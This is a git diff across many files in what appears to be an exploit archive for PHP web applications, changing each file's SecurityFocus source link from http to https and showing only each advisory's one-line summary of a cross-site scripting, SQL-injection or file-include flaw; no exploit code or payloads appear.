@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17536/info +source: https://www.securityfocus.com/bid/17536/info Tiny Web Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27658.txt b/exploits/php/webapps/27658.txt index 8ce338a30..f6f4615d9 100644 --- a/exploits/php/webapps/27658.txt +++ b/exploits/php/webapps/27658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17537/info +source: https://www.securityfocus.com/bid/17537/info phpGuestbook is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27659.txt b/exploits/php/webapps/27659.txt index dc98dc983..c52cc3242 100644 --- a/exploits/php/webapps/27659.txt +++ b/exploits/php/webapps/27659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17542/info +source: https://www.securityfocus.com/bid/17542/info phpFaber TopSites is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27660.txt b/exploits/php/webapps/27660.txt index a8c247343..dbf49f313 100644 --- a/exploits/php/webapps/27660.txt +++ b/exploits/php/webapps/27660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17546/info +source: https://www.securityfocus.com/bid/17546/info Monster Top List is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27661.txt b/exploits/php/webapps/27661.txt index a488b35bf..c2a786ea1 100644 --- a/exploits/php/webapps/27661.txt +++ b/exploits/php/webapps/27661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17553/info +source: https://www.securityfocus.com/bid/17553/info TinyPHPForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27662.txt b/exploits/php/webapps/27662.txt index 514b21cb5..16e12fa39 100644 --- a/exploits/php/webapps/27662.txt +++ b/exploits/php/webapps/27662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17554/info +source: https://www.securityfocus.com/bid/17554/info Blur6ex is prone to a local file-include vulnerability that may allow an unauthorized user to view files and to execute local scripts. diff --git a/exploits/php/webapps/27663.txt b/exploits/php/webapps/27663.txt index b0dedf482..66b1a4915 100644 --- a/exploits/php/webapps/27663.txt +++ b/exploits/php/webapps/27663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17559/info +source: https://www.securityfocus.com/bid/17559/info DbbS is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and command-execution vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27664.txt b/exploits/php/webapps/27664.txt index 807feeb8f..e36b5b53a 100644 --- a/exploits/php/webapps/27664.txt +++ b/exploits/php/webapps/27664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17560/info +source: https://www.securityfocus.com/bid/17560/info Jax Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27665.txt b/exploits/php/webapps/27665.txt index 9c7cb2d8d..1c4f4d18d 100644 --- a/exploits/php/webapps/27665.txt +++ b/exploits/php/webapps/27665.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17562/info +source: https://www.securityfocus.com/bid/17562/info Calendarix is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27666.txt b/exploits/php/webapps/27666.txt index 6e9aec805..37edb4cc3 100644 --- a/exploits/php/webapps/27666.txt +++ b/exploits/php/webapps/27666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17563/info +source: https://www.securityfocus.com/bid/17563/info Manila is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27667.txt b/exploits/php/webapps/27667.txt index 17121ab48..4d0d4e04f 100644 --- a/exploits/php/webapps/27667.txt +++ b/exploits/php/webapps/27667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17564/info +source: https://www.securityfocus.com/bid/17564/info MyBB is prone to a vulnerability that permits an attacker to overwrite global variables. This issue is due to a design flaw in handling HTTP GET and POST variables. diff --git a/exploits/php/webapps/27669.txt b/exploits/php/webapps/27669.txt index c193937d5..4aea962c8 100644 --- a/exploits/php/webapps/27669.txt +++ b/exploits/php/webapps/27669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17570/info +source: https://www.securityfocus.com/bid/17570/info Coppermine is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. diff --git a/exploits/php/webapps/27673.txt b/exploits/php/webapps/27673.txt index c97b6c079..deb78040a 100644 --- a/exploits/php/webapps/27673.txt +++ b/exploits/php/webapps/27673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17586/info +source: https://www.securityfocus.com/bid/17586/info The phpLinks application is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27674.txt b/exploits/php/webapps/27674.txt index 9cfa65d7d..a9de13eb3 100644 --- a/exploits/php/webapps/27674.txt +++ b/exploits/php/webapps/27674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17588/info +source: https://www.securityfocus.com/bid/17588/info RechnungsZentrale V2 is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27675.txt b/exploits/php/webapps/27675.txt index dc78bafe0..5c1b47edd 100644 --- a/exploits/php/webapps/27675.txt +++ b/exploits/php/webapps/27675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17591/info +source: https://www.securityfocus.com/bid/17591/info phpLister is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27676.txt b/exploits/php/webapps/27676.txt index d4e784a7c..34bbb92ff 100644 --- a/exploits/php/webapps/27676.txt +++ b/exploits/php/webapps/27676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17592/info +source: https://www.securityfocus.com/bid/17592/info CuteNews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27677.txt b/exploits/php/webapps/27677.txt index 0d590deb9..f549dd5b2 100644 --- a/exploits/php/webapps/27677.txt +++ b/exploits/php/webapps/27677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17595/info +source: https://www.securityfocus.com/bid/17595/info Article Publisher Pro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27678.txt b/exploits/php/webapps/27678.txt index ad05d8cf1..edd01df31 100644 --- a/exploits/php/webapps/27678.txt +++ b/exploits/php/webapps/27678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17596/info +source: https://www.securityfocus.com/bid/17596/info ModernBill is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27687.txt b/exploits/php/webapps/27687.txt index fa6c1c40e..4f573cd7c 100644 --- a/exploits/php/webapps/27687.txt +++ b/exploits/php/webapps/27687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17606/info +source: https://www.securityfocus.com/bid/17606/info ThWboard is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27688.txt b/exploits/php/webapps/27688.txt index a228a50d2..4702fc1d2 100644 --- a/exploits/php/webapps/27688.txt +++ b/exploits/php/webapps/27688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17612/info +source: https://www.securityfocus.com/bid/17612/info ContentBoxx is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27692.txt b/exploits/php/webapps/27692.txt index 4ce783a7a..bcacc3ccc 100644 --- a/exploits/php/webapps/27692.txt +++ b/exploits/php/webapps/27692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17617/info +source: https://www.securityfocus.com/bid/17617/info Plexum is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27693.txt b/exploits/php/webapps/27693.txt index 11b7fd111..9ccb84945 100644 --- a/exploits/php/webapps/27693.txt +++ b/exploits/php/webapps/27693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17618/info +source: https://www.securityfocus.com/bid/17618/info TotalCalendar is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27707.txt b/exploits/php/webapps/27707.txt index 439297789..0b3a4cc8c 100644 --- a/exploits/php/webapps/27707.txt +++ b/exploits/php/webapps/27707.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17623/info +source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27709.txt b/exploits/php/webapps/27709.txt index 4c8b82696..1b1fc9c5e 100644 --- a/exploits/php/webapps/27709.txt +++ b/exploits/php/webapps/27709.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17625/info +source: https://www.securityfocus.com/bid/17625/info 4images is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27710.txt b/exploits/php/webapps/27710.txt index 12f4aac86..552415d78 100644 --- a/exploits/php/webapps/27710.txt +++ b/exploits/php/webapps/27710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17626/info +source: https://www.securityfocus.com/bid/17626/info W2B Online Banking is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27711.txt b/exploits/php/webapps/27711.txt index f8135b53f..42efbc2a2 100644 --- a/exploits/php/webapps/27711.txt +++ b/exploits/php/webapps/27711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17627/info +source: https://www.securityfocus.com/bid/17627/info ThWboard is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27713.txt b/exploits/php/webapps/27713.txt index 765cf8d2e..9e914c2c3 100644 --- a/exploits/php/webapps/27713.txt +++ b/exploits/php/webapps/27713.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17630/info +source: https://www.securityfocus.com/bid/17630/info MWGuest is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27717.txt b/exploits/php/webapps/27717.txt index ffb6b89fd..961ddff03 100644 --- a/exploits/php/webapps/27717.txt +++ b/exploits/php/webapps/27717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27718.txt b/exploits/php/webapps/27718.txt index 852807926..281e7197b 100644 --- a/exploits/php/webapps/27718.txt +++ b/exploits/php/webapps/27718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27719.txt b/exploits/php/webapps/27719.txt index e534be728..f6ce6f362 100644 --- a/exploits/php/webapps/27719.txt +++ b/exploits/php/webapps/27719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27721.txt b/exploits/php/webapps/27721.txt index 3293df03e..067974c03 100644 --- a/exploits/php/webapps/27721.txt +++ b/exploits/php/webapps/27721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27722.txt b/exploits/php/webapps/27722.txt index 5dbf1726f..9bc30d0ed 100644 --- a/exploits/php/webapps/27722.txt +++ b/exploits/php/webapps/27722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27724.txt b/exploits/php/webapps/27724.txt index 3447c2577..d0cc036e0 100644 --- a/exploits/php/webapps/27724.txt +++ b/exploits/php/webapps/27724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17649/info +source: https://www.securityfocus.com/bid/17649/info Scry Gallery is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27725.txt b/exploits/php/webapps/27725.txt index 32b519573..e97cf895c 100644 --- a/exploits/php/webapps/27725.txt +++ b/exploits/php/webapps/27725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17651/info +source: https://www.securityfocus.com/bid/17651/info MKPortal is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27726.txt b/exploits/php/webapps/27726.txt index 27cd2e4fb..dc0a3bc1a 100644 --- a/exploits/php/webapps/27726.txt +++ b/exploits/php/webapps/27726.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17653/info +source: https://www.securityfocus.com/bid/17653/info Simplog is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27729.txt b/exploits/php/webapps/27729.txt index a25ea75a7..b34bb3c0b 100644 --- a/exploits/php/webapps/27729.txt +++ b/exploits/php/webapps/27729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17668/info +source: https://www.securityfocus.com/bid/17668/info Scry Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27731.txt b/exploits/php/webapps/27731.txt index c8a7c0bd1..a56fd6963 100644 --- a/exploits/php/webapps/27731.txt +++ b/exploits/php/webapps/27731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17683/info +source: https://www.securityfocus.com/bid/17683/info Photokorn is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27732.txt b/exploits/php/webapps/27732.txt index bd7954894..54c501fdb 100644 --- a/exploits/php/webapps/27732.txt +++ b/exploits/php/webapps/27732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17683/info +source: https://www.securityfocus.com/bid/17683/info Photokorn is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27733.txt b/exploits/php/webapps/27733.txt index a44898a4b..3fd092212 100644 --- a/exploits/php/webapps/27733.txt +++ b/exploits/php/webapps/27733.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17683/info +source: https://www.securityfocus.com/bid/17683/info Photokorn is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27734.txt b/exploits/php/webapps/27734.txt index 0aea6c7f8..e5af537e7 100644 --- a/exploits/php/webapps/27734.txt +++ b/exploits/php/webapps/27734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17685/info +source: https://www.securityfocus.com/bid/17685/info NextAge Shopping Cart is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27735.txt b/exploits/php/webapps/27735.txt index cb9664c80..9af7b476e 100644 --- a/exploits/php/webapps/27735.txt +++ b/exploits/php/webapps/27735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17688/info +source: https://www.securityfocus.com/bid/17688/info phpWebFTP is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input using the HTTP 'POST' method when submitting a malicious URI. diff --git a/exploits/php/webapps/27736.txt b/exploits/php/webapps/27736.txt index b377ba1c5..ba396af45 100644 --- a/exploits/php/webapps/27736.txt +++ b/exploits/php/webapps/27736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17690/info +source: https://www.securityfocus.com/bid/17690/info Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27737.txt b/exploits/php/webapps/27737.txt index 572f733c1..1bbd19f35 100644 --- a/exploits/php/webapps/27737.txt +++ b/exploits/php/webapps/27737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17696/info +source: https://www.securityfocus.com/bid/17696/info Instant Photo Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27738.txt b/exploits/php/webapps/27738.txt index a3dcd2d15..758c09e4e 100644 --- a/exploits/php/webapps/27738.txt +++ b/exploits/php/webapps/27738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17696/info +source: https://www.securityfocus.com/bid/17696/info Instant Photo Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27739.txt b/exploits/php/webapps/27739.txt index 64d9bca4f..ad05d6bf2 100644 --- a/exploits/php/webapps/27739.txt +++ b/exploits/php/webapps/27739.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17696/info +source: https://www.securityfocus.com/bid/17696/info Instant Photo Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27740.txt b/exploits/php/webapps/27740.txt index 0c0ea58e8..5e8d1dc79 100644 --- a/exploits/php/webapps/27740.txt +++ b/exploits/php/webapps/27740.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17700/info +source: https://www.securityfocus.com/bid/17700/info CuteNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27741.txt b/exploits/php/webapps/27741.txt index 11a52cd17..c2f227f20 100644 --- a/exploits/php/webapps/27741.txt +++ b/exploits/php/webapps/27741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17701/info +source: https://www.securityfocus.com/bid/17701/info FarsiNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27742.txt b/exploits/php/webapps/27742.txt index 015a4b864..0f81d629a 100644 --- a/exploits/php/webapps/27742.txt +++ b/exploits/php/webapps/27742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17703/info +source: https://www.securityfocus.com/bid/17703/info DevBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27743.txt b/exploits/php/webapps/27743.txt index c8ef552e3..a2b5465af 100644 --- a/exploits/php/webapps/27743.txt +++ b/exploits/php/webapps/27743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17707/info +source: https://www.securityfocus.com/bid/17707/info MySmartBB is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27763.php b/exploits/php/webapps/27763.php index 5508dd785..a6945a977 100644 --- a/exploits/php/webapps/27763.php +++ b/exploits/php/webapps/27763.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17731/info +source: https://www.securityfocus.com/bid/17731/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27767.txt b/exploits/php/webapps/27767.txt index 22c450e55..e6760773e 100644 --- a/exploits/php/webapps/27767.txt +++ b/exploits/php/webapps/27767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17736/info +source: https://www.securityfocus.com/bid/17736/info Artmedic Event is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27768.php b/exploits/php/webapps/27768.php index a1fc272eb..3e42772b1 100644 --- a/exploits/php/webapps/27768.php +++ b/exploits/php/webapps/27768.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17738/info +source: https://www.securityfocus.com/bid/17738/info CoolMenus is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27770.txt b/exploits/php/webapps/27770.txt index 89a2d3614..da17deb27 100644 --- a/exploits/php/webapps/27770.txt +++ b/exploits/php/webapps/27770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17744/info +source: https://www.securityfocus.com/bid/17744/info Blog Mod is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27779.txt b/exploits/php/webapps/27779.txt index 7be3df89d..f0216ac5a 100644 --- a/exploits/php/webapps/27779.txt +++ b/exploits/php/webapps/27779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17745/info +source: https://www.securityfocus.com/bid/17745/info Advanced GuestBook for phpBB is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27780.txt b/exploits/php/webapps/27780.txt index d8e97a172..17fdc3b54 100644 --- a/exploits/php/webapps/27780.txt +++ b/exploits/php/webapps/27780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17748/info +source: https://www.securityfocus.com/bid/17748/info 4Images is prone to multiple, unspecified SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27781.txt b/exploits/php/webapps/27781.txt index d54ef2d3c..2df68bd56 100644 --- a/exploits/php/webapps/27781.txt +++ b/exploits/php/webapps/27781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17748/info +source: https://www.securityfocus.com/bid/17748/info 4Images is prone to multiple, unspecified SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27782.txt b/exploits/php/webapps/27782.txt index 102ab821c..c81e6762d 100644 --- a/exploits/php/webapps/27782.txt +++ b/exploits/php/webapps/27782.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17750/info +source: https://www.securityfocus.com/bid/17750/info TextFileBB is prone to multiple script-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated content. diff --git a/exploits/php/webapps/27783.txt b/exploits/php/webapps/27783.txt index c82bf96d2..e7f7f7c28 100644 --- a/exploits/php/webapps/27783.txt +++ b/exploits/php/webapps/27783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17751/info +source: https://www.securityfocus.com/bid/17751/info W-Agora is prone to a script-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated content. diff --git a/exploits/php/webapps/27784.txt b/exploits/php/webapps/27784.txt index 4400337c3..02574dcaa 100644 --- a/exploits/php/webapps/27784.txt +++ b/exploits/php/webapps/27784.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17753/info +source: https://www.securityfocus.com/bid/17753/info PlanetGallery is prone to an authentication-bypass vulnerability. The issue occurs because the affected script fails to prompt for authentication credentials. diff --git a/exploits/php/webapps/27785.txt b/exploits/php/webapps/27785.txt index 948b24631..d399e0d2b 100644 --- a/exploits/php/webapps/27785.txt +++ b/exploits/php/webapps/27785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17756/info +source: https://www.securityfocus.com/bid/17756/info DMCounter is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27786.txt b/exploits/php/webapps/27786.txt index 1ab484111..c90486a4a 100644 --- a/exploits/php/webapps/27786.txt +++ b/exploits/php/webapps/27786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17763/info +source: https://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27787.txt b/exploits/php/webapps/27787.txt index 779224d80..dd7e5bbe6 100644 --- a/exploits/php/webapps/27787.txt +++ b/exploits/php/webapps/27787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17765/info +source: https://www.securityfocus.com/bid/17765/info MaxTrade is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27788.txt b/exploits/php/webapps/27788.txt index 72863a023..bca1d1731 100644 --- a/exploits/php/webapps/27788.txt +++ b/exploits/php/webapps/27788.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17766/info +source: https://www.securityfocus.com/bid/17766/info OrbitHYIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27789.txt b/exploits/php/webapps/27789.txt index 3d63595c3..3769b9a42 100644 --- a/exploits/php/webapps/27789.txt +++ b/exploits/php/webapps/27789.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17766/info +source: https://www.securityfocus.com/bid/17766/info OrbitHYIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27792.txt b/exploits/php/webapps/27792.txt index 946abb09d..9db85755f 100644 --- a/exploits/php/webapps/27792.txt +++ b/exploits/php/webapps/27792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17770/info +source: https://www.securityfocus.com/bid/17770/info SunShop Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27793.txt b/exploits/php/webapps/27793.txt index c40874f2f..5c82a996b 100644 --- a/exploits/php/webapps/27793.txt +++ b/exploits/php/webapps/27793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17774/info +source: https://www.securityfocus.com/bid/17774/info Collaborative Portal Server is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27794.txt b/exploits/php/webapps/27794.txt index 2e0c680de..a2694a4df 100644 --- a/exploits/php/webapps/27794.txt +++ b/exploits/php/webapps/27794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17778/info +source: https://www.securityfocus.com/bid/17778/info JSBoard is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27795.txt b/exploits/php/webapps/27795.txt index 3f120c48a..0881fda09 100644 --- a/exploits/php/webapps/27795.txt +++ b/exploits/php/webapps/27795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17779/info +source: https://www.securityfocus.com/bid/17779/info Zenphoto is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27796.txt b/exploits/php/webapps/27796.txt index 2a6fce263..d451a2e89 100644 --- a/exploits/php/webapps/27796.txt +++ b/exploits/php/webapps/27796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17779/info +source: https://www.securityfocus.com/bid/17779/info Zenphoto is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27797.txt b/exploits/php/webapps/27797.txt index 915f94271..e3136c4ad 100644 --- a/exploits/php/webapps/27797.txt +++ b/exploits/php/webapps/27797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17781/info +source: https://www.securityfocus.com/bid/17781/info XDT Pro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27798.txt b/exploits/php/webapps/27798.txt index 8b458c41a..ca0502158 100644 --- a/exploits/php/webapps/27798.txt +++ b/exploits/php/webapps/27798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17784/info +source: https://www.securityfocus.com/bid/17784/info GeoBlog is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27799.txt b/exploits/php/webapps/27799.txt index bd7bea9f5..fb20397b0 100644 --- a/exploits/php/webapps/27799.txt +++ b/exploits/php/webapps/27799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17790/info +source: https://www.securityfocus.com/bid/17790/info Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails 